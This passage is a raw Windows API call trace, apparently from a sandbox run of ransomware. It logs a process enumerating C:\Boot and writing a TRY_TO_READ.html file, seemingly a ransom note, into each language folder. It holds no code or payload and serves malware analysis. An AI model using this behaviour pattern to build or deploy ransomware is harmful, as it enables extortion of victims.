	[0051.834] GetLastError () returned 0x12
	[0051.834] SetLastError (dwErrCode=0x12) 
	[0051.834] GetLastError () returned 0x12
	[0051.834] SetLastError (dwErrCode=0x12) 
	[0051.834] GetLastError () returned 0x12
	[0051.834] SetLastError (dwErrCode=0x12) 
	[0051.834] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0051.834] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b730
	[0051.834] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.834] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596da0
	[0051.834] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x574e20
	[0051.834] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x574e20 | out: hHeap=0x540000) returned 1
	[0051.834] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.834] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.834] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596da0 | out: hHeap=0x540000) returned 1
	[0051.834] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0051.834] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1
	[0051.834] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.834] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.834] GetLastError () returned 0x12
	[0051.834] SetLastError (dwErrCode=0x12) 
	[0051.834] GetLastError () returned 0x12
	[0051.834] SetLastError (dwErrCode=0x12) 
	[0051.834] GetLastError () returned 0x12
	[0051.835] SetLastError (dwErrCode=0x12) 
	[0051.835] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0051.835] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.835] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.835] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0051.835] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596da0
	[0051.835] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1
	[0051.835] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.835] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.835] GetLastError () returned 0x12
	[0051.835] SetLastError (dwErrCode=0x12) 
	[0051.835] GetLastError () returned 0x12
	[0051.835] SetLastError (dwErrCode=0x12) 
	[0051.835] GetLastError () returned 0x12
	[0051.835] SetLastError (dwErrCode=0x12) 
	[0051.835] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0051.835] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.835] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.835] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0051.835] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0051.835] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1
	[0051.835] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.835] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.835] GetLastError () returned 0x12
	[0051.835] SetLastError (dwErrCode=0x12) 
	[0051.835] GetLastError () returned 0x12
	[0051.835] SetLastError (dwErrCode=0x12) 
	[0051.835] GetLastError () returned 0x12
	[0051.835] SetLastError (dwErrCode=0x12) 
	[0051.835] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596d50
	[0051.835] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.835] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.836] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.836] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.836] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596d50 | out: hHeap=0x540000) returned 1
	[0051.836] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.836] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1
	[0051.836] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.836] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.836] GetLastError () returned 0x12
	[0051.836] SetLastError (dwErrCode=0x12) 
	[0051.836] GetLastError () returned 0x12
	[0051.836] SetLastError (dwErrCode=0x12) 
	[0051.836] GetLastError () returned 0x12
	[0051.836] SetLastError (dwErrCode=0x12) 
	[0051.836] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596d50
	[0051.836] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0051.836] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.836] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.836] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0051.836] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596d50 | out: hHeap=0x540000) returned 1
	[0051.836] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0051.836] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1
	[0051.836] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.836] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.836] GetLastError () returned 0x12
	[0051.836] SetLastError (dwErrCode=0x12) 
	[0051.836] GetLastError () returned 0x12
	[0051.836] SetLastError (dwErrCode=0x12) 
	[0051.836] GetLastError () returned 0x12
	[0051.836] SetLastError (dwErrCode=0x12) 
	[0051.836] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596d50
	[0051.836] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.836] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.836] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.836] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.836] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596d50 | out: hHeap=0x540000) returned 1
	[0051.837] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.837] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x18) returned 0x598230
	[0051.837] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1
	[0051.837] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.837] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.837] GetLastError () returned 0x12
	[0051.837] SetLastError (dwErrCode=0x12) 
	[0051.837] GetLastError () returned 0x12
	[0051.837] SetLastError (dwErrCode=0x12) 
	[0051.837] GetLastError () returned 0x12
	[0051.837] SetLastError (dwErrCode=0x12) 
	[0051.837] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596d50
	[0051.837] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a51e8
	[0051.837] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5210
	[0051.837] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.837] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.837] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.837] GetLastError () returned 0x12
	[0051.837] SetLastError (dwErrCode=0x12) 
	[0051.837] GetLastError () returned 0x12
	[0051.837] SetLastError (dwErrCode=0x12) 
	[0051.837] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.837] CreateFileW (lpFileName="C:\\\\Boot\\cs-CZ\\TRY_TO_READ.html" (normalized: "c:\\boot\\cs-cz\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.838] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.838] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.839] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.839] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.839] CloseHandle (hObject=0x3c4) returned 1
	[0051.840] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.840] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.840] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.840] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5210 | out: hHeap=0x540000) returned 1
	[0051.840] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1
	[0051.840] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.840] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.840] GetLastError () returned 0x0
	[0051.840] SetLastError (dwErrCode=0x0) 
	[0051.840] GetLastError () returned 0x0
	[0051.840] SetLastError (dwErrCode=0x0) 
	[0051.840] GetLastError () returned 0x0
	[0051.840] SetLastError (dwErrCode=0x0) 
	[0051.840] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5210
	[0051.840] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5238
	[0051.840] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5260
	[0051.840] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.840] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.840] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.840] GetLastError () returned 0x0
	[0051.840] SetLastError (dwErrCode=0x0) 
	[0051.840] GetLastError () returned 0x0
	[0051.840] SetLastError (dwErrCode=0x0) 
	[0051.840] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.840] CreateFileW (lpFileName="C:\\\\Boot\\da-DK\\TRY_TO_READ.html" (normalized: "c:\\boot\\da-dk\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.841] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.841] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.842] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.842] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.842] CloseHandle (hObject=0x3c4) returned 1
	[0051.842] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.842] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.842] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.842] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5260 | out: hHeap=0x540000) returned 1
	[0051.842] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1
	[0051.842] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.842] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.842] GetLastError () returned 0x0
	[0051.842] SetLastError (dwErrCode=0x0) 
	[0051.842] GetLastError () returned 0x0
	[0051.842] SetLastError (dwErrCode=0x0) 
	[0051.843] GetLastError () returned 0x0
	[0051.843] SetLastError (dwErrCode=0x0) 
	[0051.843] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5260
	[0051.843] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5288
	[0051.843] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a52b0
	[0051.843] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.843] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.843] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.843] GetLastError () returned 0x0
	[0051.843] SetLastError (dwErrCode=0x0) 
	[0051.843] GetLastError () returned 0x0
	[0051.843] SetLastError (dwErrCode=0x0) 
	[0051.843] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.843] CreateFileW (lpFileName="C:\\\\Boot\\de-DE\\TRY_TO_READ.html" (normalized: "c:\\boot\\de-de\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.844] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.844] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.845] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.845] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.845] CloseHandle (hObject=0x3c4) returned 1
	[0051.845] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.846] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.846] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.846] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a52b0 | out: hHeap=0x540000) returned 1
	[0051.846] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1
	[0051.846] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.846] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.846] GetLastError () returned 0x0
	[0051.846] SetLastError (dwErrCode=0x0) 
	[0051.846] GetLastError () returned 0x0
	[0051.846] SetLastError (dwErrCode=0x0) 
	[0051.846] GetLastError () returned 0x0
	[0051.846] SetLastError (dwErrCode=0x0) 
	[0051.846] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a52b0
	[0051.846] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a52d8
	[0051.846] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5300
	[0051.846] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.846] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.846] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.846] GetLastError () returned 0x0
	[0051.846] SetLastError (dwErrCode=0x0) 
	[0051.846] GetLastError () returned 0x0
	[0051.846] SetLastError (dwErrCode=0x0) 
	[0051.846] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.846] CreateFileW (lpFileName="C:\\\\Boot\\el-GR\\TRY_TO_READ.html" (normalized: "c:\\boot\\el-gr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.847] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.847] WriteFile (in: hFile=0x3c4, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.848] WriteFile (in: hFile=0x3c4, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.848] WriteFile (in: hFile=0x3c4, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.848] CloseHandle (hObject=0x3c4) returned 1
	[0051.848] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0051.848] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.848] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.848] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5300 | out: hHeap=0x540000) returned 1
	[0051.848] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1
	[0051.848] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.848] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.848] GetLastError () returned 0x0
	[0051.848] SetLastError (dwErrCode=0x0) 
	[0051.848] GetLastError () returned 0x0
	[0051.848] SetLastError (dwErrCode=0x0) 
	[0051.848] GetLastError () returned 0x0
	[0051.848] SetLastError (dwErrCode=0x0) 
	[0051.848] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5300
	[0051.848] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5328
	[0051.848] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5350
	[0051.849] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.849] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.849] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0051.849] GetLastError () returned 0x0
	[0051.849] SetLastError (dwErrCode=0x0) 
	[0051.849] GetLastError () returned 0x0
	[0051.849] SetLastError (dwErrCode=0x0) 
	[0051.849] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.849] CreateFileW (lpFileName="C:\\\\Boot\\en-US\\TRY_TO_READ.html" (normalized: "c:\\boot\\en-us\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c4
	[0051.850] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
